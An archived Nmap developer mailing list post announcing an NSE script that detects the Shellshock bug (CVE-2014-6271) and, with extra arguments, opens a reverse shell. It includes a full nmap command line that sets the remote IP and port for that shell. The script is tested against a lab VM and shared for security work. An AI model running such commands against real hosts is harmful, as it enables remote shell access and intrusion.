Nmap Development mailing list archives
Shell Shock NSE Script (CVE-2014-6271)
From: Paul Amar <paul () sensepost com>
Date: Fri, 26 Sep 2014 09:45:05 +0100
Hi list, I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d Feel free if you have any feedback, Paul
Attachment:
http-vuln-cve-2014-6271.nse
Description:
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Shell Shock NSE Script (CVE-2014-6271) Paul AMAR (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 28)
- <Possible follow-ups>
- Shell Shock NSE Script (CVE-2014-6271) Paul Amar (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Dean Pierce (Sep 29)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)